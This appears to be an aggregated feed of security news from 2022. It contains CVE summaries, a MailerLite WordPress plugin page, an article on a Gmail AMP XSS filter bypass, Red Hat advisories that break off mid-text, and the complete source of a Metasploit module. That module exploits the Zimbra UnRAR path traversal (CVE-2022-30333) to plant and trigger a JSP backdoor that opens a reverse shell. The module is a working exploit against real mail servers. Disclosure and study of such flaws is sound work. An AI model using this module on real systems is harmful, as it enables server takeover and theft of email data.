A lack of cascading deletes in GitLab CE/EE affecting all versions starting from 13.0 before 15.0.5, all versions starting from 15.1 before 15.1.4, all versions starting from 15.2 before 15.2.1 allows a malicious Group Owner to retain a usable Group Access Token even after the Group is deleted, though the APIs usable by that token are limited.

🤖 GitLab Bot 🤖 authored Aug 03, 2022

CVE-2022-2307: 2022/CVE-2022-2307.json · master · GitLab.org / cves · GitLab

An improper access control check in GitLab CE/EE affecting all versions starting from 13.7 before 15.0.5, all versions starting from 15.1 before 15.1.4, all versions starting from 15.2 before 15.2.1 allows a malicious authenticated user to view a public project's Deploy Key's public fingerprint and name when that key has write permission. Note that GitLab never asks for nor stores the private key.

🤖 GitLab Bot 🤖 authored Aug 02, 2022

CVE-2022-2095: 2022/CVE-2022-2095.json · master · GitLab.org / cves · GitLab

Cross-Site Request Forgery (CSRF) vulnerability in MailerLite – Signup forms (official) plugin <= 1.5.7 at WordPress allows an attacker to change the API key.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**MailerLite – Signup forms (official) plugin**

The Official MailerLite signup forms plugin makes it easy to grow your newsletter subscriber list from your WordPress blog or website. The plugin automatically integrates your WordPress form with your MailerLite email marketing account.

If you don’t have MailerLite account yet, you can signup for a FREE trial here.

Once you activate the plugin, you’ll be able to select and add any of the pre-built webforms from your MailerLite account or create a new form from scratch. You can place the form in the sidebar using a widget or use a shortcode to put it wherever you want.

Setup is fast and easy! You just need to enter your MailerLite account API code and you’re all set.

Plugin features include:

*   Easily-to-add webforms from MailerLite to your WordPress blog or website
*   Option to create new webforms
*   WordPress 5 new editor support
*   Save subscribers automatically to your MailerLite account
*   Place webforms using widget or shortcode
*   Double opt-in signup
*   Updated plugin layout
*   Automate welcome emails from your MailerLite account

**Arbitrary section**

This plugin provides 1 block.

*   MailerLite signup form

**Method 1**

1.  Login to your WordPress admin panel.
2.  Open Plugins in the left sidebar, click Add New, and search for MailerLite plugin.
3.  Install the plugin and activate it.

**Method 2**

1.  Download the MailerLite plugin.
2.  Unzip the downloaded file and upload to your /wp-content/plugins/ folder.
3.  Activate the plugin in WordPress admin panel.

**Setup**

1.  After successful installation you will see MailerLite icon on the left sidebar. Click it.
2.  Enter your MailerLite account API key. You can find it in your MailerLite account by clicking “Developer API” link in the bottom of the page.
3.  Click “Add New Signup Form” .
4.  Choose “Webforms created using MailerLite” if you wan’t to use a signup form that you already created in your MailerLite account or “Custom signup form” if you want to create it now.
5.  If you want to include signup form in the sidebar of your blog or website, go to Appearance > Widgets and drag “MailerLite signup form” to the sidebar. Choose which signup form to display.
6.  If you want to include signup form inside your post or page, use shortcodes. You will see MailerLite icon in your content editor, click it and choose which form to display. It will put a shortcode (for example \[mailerlite\_form form\_id=1\]) and your visitors will see signup form in that place.

**Requirements**

*   Requires PHP5 and CURL.

**What is the plugin license?**

*   This plugin is released under a GPL license.

**What is MailerLite?**

MailerLite is easy to use web-based email marketing software. It can help you create and send email newsletters, manage subscribers, track and analyze results.

**Do I need a MailerLite account to use this plugin?**

Yes, you can easily register at www.mailerlite.com

**How to display a form in posts or pages?**

Use shortcode with form id which you created \[mailerlite\_form form\_id=1\].

Just add “MailerLite signup form widget” and select form you have created

**How to display a form in my template files?**

Use the load\_mailerlite\_form($id) function.

    <?php
    if( function_exists( 'load_mailerlite_form' ) ) {
        load_mailerlite_form(0);
    }
    

**How can I style the sign-up form?**

You can use CSS rules to style the sign-up form, use the following CSS selectors to target the various form elements.

Every form can be different, because element ID of form is:

    #mailerlite-form_(your_form_id)
    

Elements of form can be styled.

    .mailerlite-form .mailerlite-form-title {} /* the form title */
    .mailerlite-form .mailerlite-form-description {} /* the form description */
    .mailerlite-form .mailerlite-form-field label {} /* the form input label */
    .mailerlite-form .mailerlite-form-field input {} /* the form inputs */
    .mailerlite-form .mailerlite-form-loader {} /* the form loading text */
    .mailerlite-form .mailerlite-subscribe-button-container {} /* the form button container */
    .mailerlite-form .mailerlite-subscribe-button-container .mailerlite-subscribe-submit {} /* the form submit button */
    .mailerlite-form .mailerlite-form-response {} /* the form response message */
    

Add your custom CSS rules to the end of your theme stylesheet, /wp-content/themes/your-theme-name/style.css. Do not add them to the plugin stylesheet as they will be automatically overwritten on the next plugin update.

**Where can I find my MailerLite API key?**

Check it here!

The plugin mostly does what it's supposed to. They will occasionally push updates that breaks things and won't respond to any support inquiries. Be careful when updating this plugin.

I installed the plugin since a while, but it has no effect, nothing appear to setup or configure the popups. Actual version of mailer lite officially not tested (1.4.9) with current version of WP (5.8.2).

Plugin works great - I know other people have had trouble with it, but I found it easy and intuitive to integrate. MailerLite has the best support team ever!

It's working well for me so far as purely a mailing list signup mechanism. However, I'd like to be able to add new site member signups to the mailing list too (with their permission, of course). (I have Paid Memberships Pro on one site, which I did have working with Mailchimp, and LearnPress with WooCommerce on the other.) Not sure I'm techy enough to get to grips with using Zapier or some other middleman app to do this!

This is a good plugin to add a for fairly quick and easy. If you are trying to do anything more, you will run out of luck fast. There are no settings or useful code hooks (actions or filters) for customizing redirect to landing page or other useful tricks with forms.

I have no clue how I can get the new created forms visible in Wordpress... I tried a couple of times to add the API key again. And that worked, until the last time. But overall, I really like how easy it is to get the forms created AND visible in Wordpress. No issues what so ever.

Read all 20 reviews

“MailerLite – Signup forms (official)” is open source software. The following people have contributed to this plugin.

Contributors

*    mailerlite

**1.5.9**

*   Update – API client

**1.5.8**

*   Security fix

**1.5.7**

*   Tested up to latest WP version

**1.5.6**

*   Fix – deactivate issue
*   Tested up to latest WP version

**1.5.5**

*   Fix – wp\_nonce for cached pages

**1.5.4**

*   Fix – Input validation
*   Tested up to latest WP version

**1.5.3**

*   Update – API update
*   Tested up to latest WP version

**1.5.2**

*   Fix – Include Universal js

**1.5.1**

*   Fix – Form clear issue

**1.5.0**

*   Tested with WordPress 5.8.3
*   Update – Gutenberg plugin in plain JS

**1.4.10**

*   Update – Plugin display name
*   Tested up to latest WP version

**1.4.9**

*   Forms are embedded with the new method
*   1k limit to webforms API request

**1.4.8**

*   Fix – Gutenberg add / edit form fix

**1.4.7**

*   Tweak – Embedded forms subdomain changed

**1.4.6**

*   Fix – Gutenberg script enqueue called action method was non-static

**1.4.5**

*   Fix – Additional security for AJAX calls

**1.4.4**

*   Fix – Additional security for database queries

**1.4.3**

*   Fix – removed use of deprecated php method

**1.4.2**

*   Fix – Styles on form description bug
*   Update – Added a Load more button for groups on the creation stage phase.
*   Update – Hidden api key

**1.4**

*   Tweak – Show more than 100 groups when creating a custom form
*   Tweak – Renamed some classes to avoid fatal errors from other plugin having the same class names
*   Tweak – Reformatted code to WordPress code style
*   Tweak – Loading custom form javascript after window load for better optimisations
*   Tweak – Switched loading jQuery validate plugin from MailerLite CDN to your local WordPress site

**1.3.6**

*   Feature – Status page to provide information about your environment
*   Tweak – Even better support for older PHP versions in main plugin file
*   Fix – Plugin’s stylesheet is only included in pages where it is required

**1.3.5**

*   Tweak – Better support for older PHP versions in main plugin file

**1.3.4**

*   Fix – Subscriber adding bug

**1.3.3**

*   Fix – Form edit redirect not working

**1.3.2**

*   Fix – Form block js file version bump

**1.3.1**

*   Fix – “Media views” block bug

**1.3**

*   Feature – WordPress 5 block
*   Feature – Double opt-in feature
*   Tweak – New admin design
*   Update – The plugin uses MailerLite API V2 from now on

**1.2.8**

Check WP 5.0 support

**1.2.7**

API url fix

**1.2.6**

Test new WordPress

**1.2.5**

Updated forms (GDPR compatible)

**1.2.4**

release fix

**1.2.3**

fix form protocol

**1.2.2**

mistype fix in version no

**1.2.1**

adding en\_US locale language translation files

**1.2**

some small php notice errors fixed. More clear tooltips about embed forms. Popup script settings moved to settings page. Added en\_US locale translations (the same as en\_EN)

**1.1.25**

short php open tag fix

**1.1.24**

bigger curl timeout for API call, temporary

**1.1.23**

fixed translations, added english .po/.mo files, added “please wait” message translate option to custom forms

**1.1.22**

updated jquery validation script URL to use static.mailerlite.com

**1.1.21**

small bugfixes

**1.1.20**

curl error showing, empty embed form bugfix, other bugfixes

**1.1.19**

translation fixes

**1.1.18**

mistype fix for old versions

**1.1.17**

translation errors for LT language, allowing only embed and button forms

**1.1.16**

*   providing support for older PHP versions

**1.1.15**

*   file\_get\_contents changed to cURL

**1.1.14**

*   custom thank you message added

**1.1.13**

*   tested with 4.6 version

**1.1.12**

*   multisite support

**1.1.11**

*   post escaped with stripslashes\_deep

**1.1.10**

*   mistype – signing up

**1.1.9**

*   fixed app static script url

**1.1.8**

*   fixed old syntax constructors in API classes

**1.1.7**

*   option to activate popup form

**1.1.6**

*   popup webforms added

**1.1.5**

*   php notice fix

**1.1.4**

*   fixed jquery bug

**1.1.3**

*   some problem with version number

**1.1.2**

*   wordpress issue bug fix

**1.1.1**

*   updated readme and version constants

**1.1**

*   tested with up to 4.5.1 wordpress. version. Added list of languages for validation messages. Fixed mistype “sign up”

**1.0.18**

*   added php,wordpress and curl version checks before activation

**1.0.17**

*   fix db queries for update

**1.0.16**

*   links to https, db update charset

**1.0.15**

*   Updated links to knowledge base about api key, changed db charset for table – utf8\_bin

**1.0.14**

*   Removed new lines for some cases

**1.0.13**

*   Empty form description allowed

**1.0.12**

*   Fix mistype in curl method

**1.0.11**

*   Version fix

**1.0.10**

*   Some code refactor, array fixes for PHP older than 5.4

**1.0.9**

*   Curl safe mode fix

**1.0.8**

*   Fix shortcode popup

**1.0.7**

*   Fix shortcode

**1.0.6**

*   Fix embedded form cache

**1.0.5**

*   Fix for WP 4.0

**1.0.4**

*   Subscribe button update

**1.0.3**

*   jQuery load update

**1.0.2**

*   Small changes

**1.0.1**

*   Added translations

**1.0**

*   First release

CVE-2022-33201: MailerLite – Signup forms (official)

Multiple Improper Access Control vulnerabilities in StoreApps Affiliate For WooCommerce premium plugin <= 4.7.0 at WordPress.

CVE-2022-25649

Researcher bypasses email filter with inspired style tag trickery

Adam Bannister 05 August 2022 at 15:59 UTC

Researcher bypasses email filter with inspired style tag trickery

A cross-site scripting (XSS) vulnerability in AMP for Email, Gmail’s dynamic email feature, has netted a security researcher a $5,000 bug bounty payout.

AMP for Email brings AMP functionality to rich, interactive emails. AMP itself is an open source HTML framework used to optimize websites for web browsing on mobile.

Adi Cohen, who unearthed the security flaw, said he had no problem finding a vector that triggered an XSS within the AMP playground, but found bypassing Gmail’s XSS filter a much tougher assignment.

**Rendering contexts**

The “easiest way to circumvent an XSS filter is by tricking it into a different rendering context than what the browser will actually use to render a given piece of code”, observed Cohen in a blog post.

Since AMP for Email forbids the likes of templates, SVG, math, and CSS, he instead targeted stylesheets as a potential path to an XSS payload with multiple rendering contexts.

RELATED XSS vulnerabilities in Google Cloud, Google Play could lead to account hijacks

This required a discrepancy between how the stylesheet is rendered by the filter and browser, either by “tricking the filter into believing a fake style tag is real”, or “the exact opposite”.

Cohen’s initial vector worked in the sandbox because AMP “leaves the CSS context as soon as it encounters the string ‘’ even if it doesn’t have a closing bracket () or at least a whitespace after it”.

He was then able to “trick the filter into believing we’re back in HTML context, while the browser obviously ignores entirely and stays well within the realm of CSS”.

**</styl> over substance**

But “what looked like a promising vector in AMP, seemed way less interesting after Gmail ran its magic on it,” said Cohen.

A breakthrough came when he harnessed a CSS selector, which ensured the payload was returned unchanged by Gmail – “no escaping or other mutations”.

However, the malicious payload prompted an error after the AMP sandbox encountered ‘’, so Cohen tried , but Gmail’s filter was wise to its resemblance to .

What worked instead was testing a benign payload with an encoded selector – because Gmail decoded it, he could use the selector to inject a closing style tag.

Cohen reported the issue to Google on March 27, 2021, and noticed on July 7 that it had been fixed.

As previously reported by The Daily Swig, Google addressed an unrelated, notable XSS in AMP For Email back in 2019, after security researcher Michał Bentkowski leveraged id attributes in tags to enable ‘DOM clobbering’ attacks.

RELATED Authentication bypass bug in Nextauth.js could allow email account takeover

XSS in Gmail’s AMP For Email earns researcher $5,000

This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  include Msf::Exploit::Format::RarSymlinkPathTraversal  def initialize(info = {})    super(      update_info(        info,        'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',        'Description' => %q{          This module creates a RAR file that can be emailed to a Zimbra server          to exploit CVE-2022-30333. If successful, it plants a JSP-based          backdoor in the public web directory, then executes that backdoor.          The core vulnerability is a path-traversal issue in unRAR that can          extract an arbitrary file to an arbitrary location on a Linux system.          This issue is exploitable on the following versions of Zimbra, provided          UnRAR version 6.11 or earlier is installed:          * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)          * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)        },        'Author' => [          'Simon Scannell', # Discovery / initial disclosure (via Sonar)          'Ron Bowes', # Analysis, PoC, and module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-30333'],          ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],          ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],          ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],        ],        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Zimbra Collaboration Suite', {} ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',          'TARGET_FILENAME' => nil,          'DisablePayloadHandler' => false,          'RPORT' => 443,          'SSL' => true        },        'Stance' => Msf::Exploit::Stance::Passive,        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-06-28',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),        # Separating the path, filename, and extension allows us to randomize the filename        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),      ]    )    register_advanced_options(      [        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),        # Took this from multi/handler        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])      ]    )  end  # Generate an on-system filename using datastore options  def generate_target_filename    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')      print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')    end    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")  end  # Normalize the path traversal and figure out where it is relative to the web root  def zimbra_get_public_path(target_filename)    # Normalize the path    normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath    # Figure out where it is, relative to the webroot    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')    relative_path = normalized_path.relative_path_from(webroot)    # Hopefully, we found a path from the webroot to the payload!    if relative_path.to_s.start_with?('../')      return nil    end    relative_path  end  def exploit    print_status('Encoding the payload as a .jsp file')    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)    # Create a file    target_filename = generate_target_filename    print_status("Target filename: #{target_filename}")    begin      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)    rescue StandardError => e      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")    end    file_create(rar)    print_good('File created! Email the file above to any user on the target Zimbra server')    # Bail if they don't want the payload triggered    return unless datastore['TRIGGER_PAYLOAD']    # Get the public path for triggering the vulnerability, terminate if we    # can't figure it out    public_filename = zimbra_get_public_path(target_filename)    if public_filename.nil?      print_warning('Could not determine the public web path, disabling payload triggering')      return    end    register_file_for_cleanup(target_filename)    interval = datastore['CheckInterval'].to_i    print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...")    # This loop is mostly from `multi/handler`    stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i    timeout = datastore['ListenerTimeout'].to_i    loop do      break if session_created?      break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(public_filename)      )      unless res        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')      end      Rex::ThreadSafe.sleep(interval)    end  endend

Zimbra UnRAR Path Traversal

Red Hat Security Advisory 2022-5905-01 - X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon. Issues addressed include an out of bounds access vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: xorg-x11-server security update  
Advisory ID:       RHSA-2022:5905-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5905  
Issue date:        2022-08-04  
CVE Names:         CVE-2022-2319 CVE-2022-2320  
====================================================================  
1. Summary:

An update for xorg-x11-server is now available for Red Hat Enterprise Linux  
7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

X.Org is an open-source implementation of the X Window System. It provides  
the basic low-level functionality that full-fledged graphical user  
interfaces are designed upon.

Security Fix(es):

* xorg-x11-server: X.Org Server ProcXkbSetGeometry out-of-bounds access  
(CVE-2022-2319)

* xorg-x11-server: out-of-bounds access in ProcXkbSetDeviceInfo request  
handler of the Xkb extension (CVE-2022-2320)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2106671 - CVE-2022-2319 xorg-x11-server: X.Org Server ProcXkbSetGeometry out-of-bounds access  
2106683 - CVE-2022-2320 xorg-x11-server: out-of-bounds access in ProcXkbSetDeviceInfo request handler of the Xkb extension

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
xorg-x11-server-1.20.4-18.el7_9.src.rpm

x86_64:  
xorg-x11-server-Xephyr-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
xorg-x11-server-source-1.20.4-18.el7_9.noarch.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
xorg-x11-server-1.20.4-18.el7_9.src.rpm

noarch:  
xorg-x11-server-source-1.20.4-18.el7_9.noarch.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
xorg-x11-server-1.20.4-18.el7_9.src.rpm

ppc64:  
xorg-x11-server-Xephyr-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-Xorg-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-common-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.ppc64.rpm

ppc64le:  
xorg-x11-server-Xephyr-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-Xorg-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-common-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.ppc64le.rpm

s390x:  
xorg-x11-server-Xephyr-1.20.4-18.el7_9.s390x.rpm  
xorg-x11-server-common-1.20.4-18.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.s390x.rpm

x86_64:  
xorg-x11-server-Xephyr-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
xorg-x11-server-source-1.20.4-18.el7_9.noarch.rpm

ppc64:  
xorg-x11-server-Xdmx-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-Xnest-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-Xvfb-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-Xwayland-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.ppc.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.ppc64.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.ppc.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.ppc64.rpm

ppc64le:  
xorg-x11-server-Xdmx-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-Xnest-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-Xvfb-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-Xwayland-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.ppc64le.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.ppc64le.rpm

s390x:  
xorg-x11-server-Xdmx-1.20.4-18.el7_9.s390x.rpm  
xorg-x11-server-Xnest-1.20.4-18.el7_9.s390x.rpm  
xorg-x11-server-Xvfb-1.20.4-18.el7_9.s390x.rpm  
xorg-x11-server-Xwayland-1.20.4-18.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.s390x.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
xorg-x11-server-1.20.4-18.el7_9.src.rpm

x86_64:  
xorg-x11-server-Xephyr-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
xorg-x11-server-source-1.20.4-18.el7_9.noarch.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-18.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-18.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2319  
https://access.redhat.com/security/cve/CVE-2022-2320  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuwKgdzjgjWX9erEAQg+3xAAgY5izOFH9D7gqwT4JPwmm/GJywznUUcN  
bTpnL7FHhbigQUfMOgBcUIZny0mkzuUdbdqDdbdvTaWe5BeikSuBtAhqtVW/OhOq  
RoFxuDyP1EpIFkiAP9o2KGjPJ48m8D4Rc69aeqie+tlnhnplU5BwDwNML0/EXvDv  
79HgQJaAVwjbBYq01CL6Up6LnweQi01mOQYF6JkQRDIBb7HkojtkHDdmJrPiJ4j7  
IJEygZpbwCAc46k21+kBACv2B5SE5/BVP1auzGnqlmJQb6EwhI3XbuhpFK8fp1b9  
zZCCWIH92XuB+jmWbkVDxSQMYNK3OntSOUueBpoijoEhhoFbL39a2Zi5vIbyn2sh  
k+fk26D5uRp3h2I6scrNhH6PcKsD4ooC4tjpOzn8CTRSTbU2E/ns+/TpQfof33DD  
2F6wyjyeHOHG5qVj6d8meiBJ5RXuIfU7F0ImQGmFXIU99DmxujlPYok+jsWDIBHC  
otiH6KvGrWmvV/wK0j3ZQTUUG3HU5PT5kNMvfGfuDJz8JzL3eX73qAzyTytSA2IB  
oPjC0thWDdzX7vHyA0E5qk8xC12fRohK/O18BN4KNie3ku7SSGnbxAuvGvq9Py8R  
7zDP2waxx388LQbGuBJn4GZCV6216P4S0Z4HgZD0vyLyzaAjG/z+v7KWGmBoQHLQ  
OYD4kAvnRCM=6Q2u  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5905-01

Red Hat Security Advisory 2022-5908-01 - Openshift Logging Bug Fix Release. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Openshift Logging Bug Fix and security update Release (5.3.10)  
Advisory ID:       RHSA-2022:5908-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5908  
Issue date:        2022-08-04  
CVE Names:         CVE-2021-38561 CVE-2021-40528 CVE-2022-1271  
                   CVE-2022-1621 CVE-2022-1629 CVE-2022-21540  
                   CVE-2022-21541 CVE-2022-22576 CVE-2022-25313  
                   CVE-2022-25314 CVE-2022-27774 CVE-2022-27776  
                   CVE-2022-27782 CVE-2022-29824 CVE-2022-34169  
====================================================================  
1. Summary:

Openshift Logging Bug Fix Release (5.3.10)

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.3.10)

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
